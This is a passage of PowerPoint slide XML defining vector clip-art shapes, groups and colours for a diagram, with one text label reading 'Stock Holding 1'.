                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 80 w 81"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 39 w 81"/>
                    <a:gd name="T9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80">
                      <a:moveTo>
                        <a:pt x="39" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="21" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="78"/>
                        <a:pt x="81" y="60"/>
                        <a:pt x="80" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="17"/>
                        <a:pt x="61" y="0"/>
                        <a:pt x="39" y="1"/>
                      </a:cubicBezTo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59" name="Freeform 725"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3938" y="3898"/>
                  <a:ext cx="24" cy="390"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 8 w 10"/>
                    <a:gd name="T1" fmla="*/ 165 h 165"/>
                    <a:gd name="T2" fmla="*/ 9 w 10"/>
                    <a:gd name="T3" fmla="*/ 12 h 165"/>
                    <a:gd name="T4" fmla="*/ 0 w 10"/>
                    <a:gd name="T5" fmla="*/ 0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" h="165">
                      <a:moveTo>
                        <a:pt x="8" y="165"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="131"/>
                        <a:pt x="10" y="16"/>
                        <a:pt x="9" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="8"/>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:ln w="6350" cap="rnd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686" name="Freeform 394"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="5400787" y="3338144"/>
              <a:ext cx="2036762" cy="547688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chemeClr val="bg1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687" name="Group 542"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="6485049" y="3331794"/>
              <a:ext cx="165100" cy="328613"/>
              <a:chOff x="2277" y="2598"/>
              <a:chExt cx="317" cy="628"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="688" name="Freeform 543"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2424" y="2902"/>
                <a:ext cx="119" cy="324"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 89 w 90"/>
                  <a:gd name="T1" fmla="*/ 156 h 245"/>
                  <a:gd name="T2" fmla="*/ 89 w 90"/>
                  <a:gd name="T3" fmla="*/ 7 h 245"/>
                  <a:gd name="T4" fmla="*/ 89 w 90"/>
                  <a:gd name="T5" fmla="*/ 5 h 245"/>
                  <a:gd name="T6" fmla="*/ 63 w 90"/>
                  <a:gd name="T7" fmla="*/ 20 h 245"/>
                  <a:gd name="T8" fmla="*/ 12 w 90"/>
                  <a:gd name="T9" fmla="*/ 10 h 245"/>
                  <a:gd name="T10" fmla="*/ 2 w 90"/>
                  <a:gd name="T11" fmla="*/ 0 h 245"/>
                  <a:gd name="T12" fmla="*/ 3 w 90"/>
                  <a:gd name="T13" fmla="*/ 36 h 245"/>
                  <a:gd name="T14" fmla="*/ 2 w 90"/>
                  <a:gd name="T15" fmla="*/ 205 h 245"/>
                  <a:gd name="T16" fmla="*/ 43 w 90"/>
                  <a:gd name="T17" fmla="*/ 205 h 245"/>
                  <a:gd name="T18" fmla="*/ 45 w 90"/>
                  <a:gd name="T19" fmla="*/ 51 h 245"/>
                  <a:gd name="T20" fmla="*/ 36 w 90"/>
                  <a:gd name="T21" fmla="*/ 40 h 245"/>
                  <a:gd name="T22" fmla="*/ 45 w 90"/>
                  <a:gd name="T23" fmla="*/ 51 h 245"/>
                  <a:gd name="T24" fmla="*/ 43 w 90"/>
                  <a:gd name="T25" fmla="*/ 205 h 245"/>
                  <a:gd name="T26" fmla="*/ 44 w 90"/>
                  <a:gd name="T27" fmla="*/ 211 h 245"/>
                  <a:gd name="T28" fmla="*/ 88 w 90"/>
                  <a:gd name="T29" fmla="*/ 218 h 245"/>
                  <a:gd name="T30" fmla="*/ 89 w 90"/>
                  <a:gd name="T31" fmla="*/ 156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0" h="245">
                    <a:moveTo>
                      <a:pt x="89" y="156"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="141"/>
                      <a:pt x="90" y="47"/>
                      <a:pt x="89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  <a:cubicBezTo>
                      <a:pt x="55" y="20"/>
                      <a:pt x="24" y="13"/>
                      <a:pt x="12" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="10"/>
                      <a:pt x="4" y="5"/>
                      <a:pt x="2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5"/>
                      <a:pt x="43" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="171"/>
                      <a:pt x="46" y="55"/>
                      <a:pt x="45" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="47"/>
                      <a:pt x="36" y="47"/>
                      <a:pt x="36" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="47"/>
                      <a:pt x="45" y="47"/>
                      <a:pt x="45" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="55"/>
                      <a:pt x="43" y="171"/>
                      <a:pt x="43" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="207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50000">
                    <a:schemeClr val="bg1">
                      <a:gamma/>
                      <a:shade val="85882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9" name="Freeform 544"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2282" y="2684"/>
                <a:ext cx="312" cy="257"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 235 w 236"/>
                  <a:gd name="T1" fmla="*/ 114 h 194"/>
                  <a:gd name="T2" fmla="*/ 235 w 236"/>
                  <a:gd name="T3" fmla="*/ 114 h 194"/>
                  <a:gd name="T4" fmla="*/ 225 w 236"/>
                  <a:gd name="T5" fmla="*/ 49 h 194"/>
                  <a:gd name="T6" fmla="*/ 199 w 236"/>
                  <a:gd name="T7" fmla="*/ 24 h 194"/>
                  <a:gd name="T8" fmla="*/ 156 w 236"/>
                  <a:gd name="T9" fmla="*/ 13 h 194"/>
                  <a:gd name="T10" fmla="*/ 116 w 236"/>
                  <a:gd name="T11" fmla="*/ 2 h 194"/>
                  <a:gd name="T12" fmla="*/ 86 w 236"/>
                  <a:gd name="T13" fmla="*/ 12 h 194"/>
                  <a:gd name="T14" fmla="*/ 73 w 236"/>
                  <a:gd name="T15" fmla="*/ 86 h 194"/>
                  <a:gd name="T16" fmla="*/ 73 w 236"/>
                  <a:gd name="T17" fmla="*/ 86 h 194"/>
                  <a:gd name="T18" fmla="*/ 72 w 236"/>
                  <a:gd name="T19" fmla="*/ 91 h 194"/>
                  <a:gd name="T20" fmla="*/ 21 w 236"/>
                  <a:gd name="T21" fmla="*/ 104 h 194"/>
                  <a:gd name="T22" fmla="*/ 26 w 236"/>
                  <a:gd name="T23" fmla="*/ 135 h 194"/>
                  <a:gd name="T24" fmla="*/ 80 w 236"/>
                  <a:gd name="T25" fmla="*/ 122 h 194"/>
                  <a:gd name="T26" fmla="*/ 80 w 236"/>
                  <a:gd name="T27" fmla="*/ 122 h 194"/>
                  <a:gd name="T28" fmla="*/ 86 w 236"/>
                  <a:gd name="T29" fmla="*/ 120 h 194"/>
                  <a:gd name="T30" fmla="*/ 99 w 236"/>
                  <a:gd name="T31" fmla="*/ 112 h 194"/>
                  <a:gd name="T32" fmla="*/ 104 w 236"/>
                  <a:gd name="T33" fmla="*/ 92 h 194"/>
                  <a:gd name="T34" fmla="*/ 104 w 236"/>
                  <a:gd name="T35" fmla="*/ 92 h 194"/>
                  <a:gd name="T36" fmla="*/ 110 w 236"/>
                  <a:gd name="T37" fmla="*/ 47 h 194"/>
                  <a:gd name="T38" fmla="*/ 109 w 236"/>
                  <a:gd name="T39" fmla="*/ 167 h 194"/>
                  <a:gd name="T40" fmla="*/ 118 w 236"/>
                  <a:gd name="T41" fmla="*/ 178 h 194"/>
                  <a:gd name="T42" fmla="*/ 169 w 236"/>
                  <a:gd name="T43" fmla="*/ 192 h 194"/>
                  <a:gd name="T44" fmla="*/ 196 w 236"/>
                  <a:gd name="T45" fmla="*/ 173 h 194"/>
                  <a:gd name="T46" fmla="*/ 196 w 236"/>
                  <a:gd name="T47" fmla="*/ 160 h 194"/>
                  <a:gd name="T48" fmla="*/ 216 w 236"/>
                  <a:gd name="T49" fmla="*/ 155 h 194"/>
                  <a:gd name="T50" fmla="*/ 219 w 236"/>
                  <a:gd name="T51" fmla="*/ 154 h 194"/>
                  <a:gd name="T52" fmla="*/ 232 w 236"/>
                  <a:gd name="T53" fmla="*/ 146 h 194"/>
                  <a:gd name="T54" fmla="*/ 236 w 236"/>
                  <a:gd name="T55" fmla="*/ 124 h 194"/>
                  <a:gd name="T56" fmla="*/ 235 w 236"/>
                  <a:gd name="T57" fmla="*/ 114 h 194"/>
                  <a:gd name="T58" fmla="*/ 192 w 236"/>
                  <a:gd name="T59" fmla="*/ 75 h 194"/>
                  <a:gd name="T60" fmla="*/ 194 w 236"/>
                  <a:gd name="T61" fmla="*/ 88 h 194"/>
                  <a:gd name="T62" fmla="*/ 200 w 236"/>
                  <a:gd name="T63" fmla="*/ 123 h 194"/>
                  <a:gd name="T64" fmla="*/ 196 w 236"/>
                  <a:gd name="T65" fmla="*/ 124 h 194"/>
                  <a:gd name="T66" fmla="*/ 194 w 236"/>
                  <a:gd name="T67" fmla="*/ 88 h 194"/>
                  <a:gd name="T68" fmla="*/ 192 w 236"/>
                  <a:gd name="T69" fmla="*/ 75 h 194"/>
                  <a:gd name="T70" fmla="*/ 192 w 236"/>
                  <a:gd name="T71" fmla="*/ 71 h 194"/>
                  <a:gd name="T72" fmla="*/ 192 w 236"/>
                  <a:gd name="T73" fmla="*/ 75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6" h="194">
                    <a:moveTo>
                      <a:pt x="235" y="114"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="235" y="114"/>
                      <a:pt x="235" y="114"/>
                      <a:pt x="235" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="230" y="85"/>
                      <a:pt x="226" y="57"/>
                      <a:pt x="225" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="222" y="32"/>
                      <a:pt x="207" y="27"/>
                      <a:pt x="199" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="191" y="21"/>
                      <a:pt x="169" y="16"/>
                      <a:pt x="156" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="9"/>
                      <a:pt x="125" y="3"/>
                      <a:pt x="116" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="0"/>
                      <a:pt x="89" y="4"/>
                      <a:pt x="86" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="14"/>
                      <a:pt x="79" y="50"/>
                      <a:pt x="73" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="86"/>
                      <a:pt x="73" y="86"/>
                      <a:pt x="73" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="91"/>
                      <a:pt x="72" y="91"/>
                      <a:pt x="72" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="96"/>
                      <a:pt x="28" y="103"/>
                      <a:pt x="21" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="109"/>
                      <a:pt x="9" y="137"/>
                      <a:pt x="26" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="135"/>
                      <a:pt x="55" y="129"/>
                      <a:pt x="80" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="122"/>
                      <a:pt x="80" y="122"/>
                      <a:pt x="80" y="122"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="120"/>
                      <a:pt x="86" y="120"/>
                      <a:pt x="86" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="118"/>
                      <a:pt x="96" y="116"/>
                      <a:pt x="99" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="108"/>
                      <a:pt x="104" y="102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65"/>
                      <a:pt x="110" y="43"/>
                      <a:pt x="110" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="53"/>
                      <a:pt x="109" y="125"/>
                      <a:pt x="109" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="172"/>
                      <a:pt x="112" y="177"/>
                      <a:pt x="118" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="180"/>
                      <a:pt x="162" y="190"/>
                      <a:pt x="169" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="177" y="194"/>
                      <a:pt x="193" y="184"/>
                      <a:pt x="196" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="171"/>
                      <a:pt x="196" y="162"/>
                      <a:pt x="196" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="202" y="158"/>
                      <a:pt x="208" y="157"/>
                      <a:pt x="216" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="217" y="155"/>
                      <a:pt x="218" y="154"/>
                      <a:pt x="219" y="154"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="225" y="152"/>
                      <a:pt x="229" y="150"/>
                      <a:pt x="232" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="235" y="142"/>
                      <a:pt x="236" y="135"/>
                      <a:pt x="236" y="124"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="235" y="114"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="192" y="75"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="79"/>
                      <a:pt x="194" y="83"/>
                      <a:pt x="194" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="195" y="97"/>
                      <a:pt x="197" y="108"/>
                      <a:pt x="200" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="198" y="123"/>
                      <a:pt x="197" y="124"/>
                      <a:pt x="196" y="124"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="111"/>
                      <a:pt x="195" y="99"/>
                      <a:pt x="194" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="82"/>
                      <a:pt x="193" y="78"/>
                      <a:pt x="192" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="192" y="73"/>
                      <a:pt x="192" y="72"/>
                      <a:pt x="192" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="192" y="72"/>
                      <a:pt x="192" y="73"/>
                      <a:pt x="192" y="7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50000">
                    <a:schemeClr val="bg1">
                      <a:gamma/>
                      <a:shade val="85882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0" name="Freeform 545"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2438" y="2668"/>
                <a:ext cx="87" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 66"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 10 w 66"/>
                  <a:gd name="T3" fmla="*/ 23 h 41"/>
                  <a:gd name="T4" fmla="*/ 15 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 53 w 66"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 57 w 66"/>
                  <a:gd name="T9" fmla="*/ 29 h 41"/>
                  <a:gd name="T10" fmla="*/ 29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4" y="37"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="10" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="21"/>
                      <a:pt x="13" y="16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29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="46" y="41"/>
                      <a:pt x="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1" name="Oval 546"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="2429" y="2598"/>
                <a:ext cx="104" cy="105"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="6350" algn="ctr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692" name="Group 547"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2277" y="2765"/>
                <a:ext cx="256" cy="201"/>
                <a:chOff x="1315" y="1508"/>
                <a:chExt cx="596" cy="469"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="694" name="Freeform 548"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1315" y="1508"/>
                  <a:ext cx="596" cy="161"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 904"/>
                    <a:gd name="T1" fmla="*/ 123 h 244"/>
                    <a:gd name="T2" fmla="*/ 451 w 904"/>
                    <a:gd name="T3" fmla="*/ 0 h 244"/>
                    <a:gd name="T4" fmla="*/ 904 w 904"/>
                    <a:gd name="T5" fmla="*/ 123 h 244"/>
                    <a:gd name="T6" fmla="*/ 451 w 904"/>
                    <a:gd name="T7" fmla="*/ 244 h 244"/>
                    <a:gd name="T8" fmla="*/ 0 w 904"/>
                    <a:gd name="T9" fmla="*/ 123 h 2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rgbClr val="E2420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95" name="Freeform 549"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1612" y="1589"/>
                  <a:ext cx="299" cy="388"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 453"/>
                    <a:gd name="T1" fmla="*/ 589 h 589"/>
                    <a:gd name="T2" fmla="*/ 0 w 453"/>
                    <a:gd name="T3" fmla="*/ 121 h 589"/>
                    <a:gd name="T4" fmla="*/ 453 w 453"/>
                    <a:gd name="T5" fmla="*/ 0 h 589"/>
                    <a:gd name="T6" fmla="*/ 453 w 453"/>
                    <a:gd name="T7" fmla="*/ 468 h 589"/>
                    <a:gd name="T8" fmla="*/ 0 w 453"/>
                    <a:gd name="T9" fmla="*/ 589 h 5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rgbClr val="E2420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696" name="Freeform 550"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1315" y="1589"/>
                  <a:ext cx="297" cy="388"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 451"/>
                    <a:gd name="T1" fmla="*/ 0 h 589"/>
                    <a:gd name="T2" fmla="*/ 0 w 451"/>
                    <a:gd name="T3" fmla="*/ 468 h 589"/>
                    <a:gd name="T4" fmla="*/ 451 w 451"/>
                    <a:gd name="T5" fmla="*/ 589 h 589"/>
                    <a:gd name="T6" fmla="*/ 451 w 451"/>
                    <a:gd name="T7" fmla="*/ 121 h 589"/>
                    <a:gd name="T8" fmla="*/ 0 w 451"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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2420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93" name="Freeform 551"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2447" y="2847"/>
                <a:ext cx="121" cy="71"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 75 w 91"/>
                  <a:gd name="T1" fmla="*/ 0 h 54"/>
                  <a:gd name="T2" fmla="*/ 27 w 91"/>
                  <a:gd name="T3" fmla="*/ 14 h 54"/>
                  <a:gd name="T4" fmla="*/ 40 w 91"/>
                  <a:gd name="T5" fmla="*/ 46 h 54"/>
                  <a:gd name="T6" fmla="*/ 91 w 91"/>
                  <a:gd name="T7" fmla="*/ 3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1" h="54">
                    <a:moveTo>
                      <a:pt x="75" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="4"/>
                      <a:pt x="45" y="9"/>
                      <a:pt x="27" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="22"/>
                      <a:pt x="17" y="54"/>
                      <a:pt x="40" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="44"/>
                      <a:pt x="65" y="38"/>
                      <a:pt x="91" y="3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50000">
                    <a:schemeClr val="bg1">
                      <a:gamma/>
                      <a:shade val="85882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697" name="Rectangle 696"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5791445" y="3915327"/>
              <a:ext cx="1177053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Stock Holding 1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="698" name="Group 39"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="6010387" y="3354891"/>
              <a:ext cx="452437" cy="347663"/>
              <a:chOff x="1492" y="2641"/>
              <a:chExt cx="866" cy="668"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="699" name="Group 40"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1982" y="2641"/>
                <a:ext cx="312" cy="532"/>
                <a:chOff x="1924" y="1129"/>
                <a:chExt cx="312" cy="532"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="720" name="Freeform 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1924" y="1216"/>
                  <a:ext cx="312" cy="245"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 235 w 237"/>
                    <a:gd name="T1" fmla="*/ 113 h 186"/>
                    <a:gd name="T2" fmla="*/ 235 w 237"/>
                    <a:gd name="T3" fmla="*/ 113 h 186"/>
                    <a:gd name="T4" fmla="*/ 225 w 237"/>
                    <a:gd name="T5" fmla="*/ 49 h 186"/>
                    <a:gd name="T6" fmla="*/ 199 w 237"/>
                    <a:gd name="T7" fmla="*/ 24 h 186"/>
                    <a:gd name="T8" fmla="*/ 156 w 237"/>
                    <a:gd name="T9" fmla="*/ 12 h 186"/>
                    <a:gd name="T10" fmla="*/ 116 w 237"/>
                    <a:gd name="T11" fmla="*/ 2 h 186"/>
                    <a:gd name="T12" fmla="*/ 87 w 237"/>
                    <a:gd name="T13" fmla="*/ 12 h 186"/>
                    <a:gd name="T14" fmla="*/ 73 w 237"/>
                    <a:gd name="T15" fmla="*/ 85 h 186"/>
                    <a:gd name="T16" fmla="*/ 73 w 237"/>
                    <a:gd name="T17" fmla="*/ 85 h 186"/>
                    <a:gd name="T18" fmla="*/ 72 w 237"/>
                    <a:gd name="T19" fmla="*/ 90 h 186"/>
                    <a:gd name="T20" fmla="*/ 21 w 237"/>
                    <a:gd name="T21" fmla="*/ 104 h 186"/>
                    <a:gd name="T22" fmla="*/ 26 w 237"/>
                    <a:gd name="T23" fmla="*/ 135 h 186"/>
                    <a:gd name="T24" fmla="*/ 80 w 237"/>
                    <a:gd name="T25" fmla="*/ 122 h 186"/>
                    <a:gd name="T26" fmla="*/ 80 w 237"/>
                    <a:gd name="T27" fmla="*/ 122 h 186"/>
                    <a:gd name="T28" fmla="*/ 86 w 237"/>
                    <a:gd name="T29" fmla="*/ 120 h 186"/>
                    <a:gd name="T30" fmla="*/ 99 w 237"/>
                    <a:gd name="T31" fmla="*/ 112 h 186"/>
                    <a:gd name="T32" fmla="*/ 104 w 237"/>
                    <a:gd name="T33" fmla="*/ 92 h 186"/>
                    <a:gd name="T34" fmla="*/ 104 w 237"/>
                    <a:gd name="T35" fmla="*/ 92 h 186"/>
                    <a:gd name="T36" fmla="*/ 110 w 237"/>
                    <a:gd name="T37" fmla="*/ 47 h 186"/>
                    <a:gd name="T38" fmla="*/ 109 w 237"/>
                    <a:gd name="T39" fmla="*/ 160 h 186"/>
                    <a:gd name="T40" fmla="*/ 119 w 237"/>
                    <a:gd name="T41" fmla="*/ 170 h 186"/>
                    <a:gd name="T42" fmla="*/ 169 w 237"/>
                    <a:gd name="T43" fmla="*/ 184 h 186"/>
                    <a:gd name="T44" fmla="*/ 196 w 237"/>
                    <a:gd name="T45" fmla="*/ 165 h 186"/>
                    <a:gd name="T46" fmla="*/ 196 w 237"/>
                    <a:gd name="T47" fmla="*/ 160 h 186"/>
                    <a:gd name="T48" fmla="*/ 216 w 237"/>
                    <a:gd name="T49" fmla="*/ 155 h 186"/>
                    <a:gd name="T50" fmla="*/ 219 w 237"/>
                    <a:gd name="T51" fmla="*/ 154 h 186"/>
                    <a:gd name="T52" fmla="*/ 232 w 237"/>
                    <a:gd name="T53" fmla="*/ 146 h 186"/>
                    <a:gd name="T54" fmla="*/ 237 w 237"/>
                    <a:gd name="T55" fmla="*/ 124 h 186"/>
                    <a:gd name="T56" fmla="*/ 235 w 237"/>
                    <a:gd name="T57" fmla="*/ 113 h 186"/>
                    <a:gd name="T58" fmla="*/ 193 w 237"/>
                    <a:gd name="T59" fmla="*/ 75 h 186"/>
                    <a:gd name="T60" fmla="*/ 194 w 237"/>
                    <a:gd name="T61" fmla="*/ 87 h 186"/>
                    <a:gd name="T62" fmla="*/ 200 w 237"/>
                    <a:gd name="T63" fmla="*/ 123 h 186"/>
                    <a:gd name="T64" fmla="*/ 196 w 237"/>
                    <a:gd name="T65" fmla="*/ 124 h 186"/>
                    <a:gd name="T66" fmla="*/ 194 w 237"/>
                    <a:gd name="T67" fmla="*/ 87 h 186"/>
                    <a:gd name="T68" fmla="*/ 193 w 237"/>
                    <a:gd name="T69" fmla="*/ 75 h 186"/>
                    <a:gd name="T70" fmla="*/ 192 w 237"/>
                    <a:gd name="T71" fmla="*/ 70 h 186"/>
                    <a:gd name="T72" fmla="*/ 193 w 237"/>
                    <a:gd name="T73" fmla="*/ 75 h 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7" h="186">
                      <a:moveTo>
                        <a:pt x="235" y="113"/>
                      </a:moveTo>
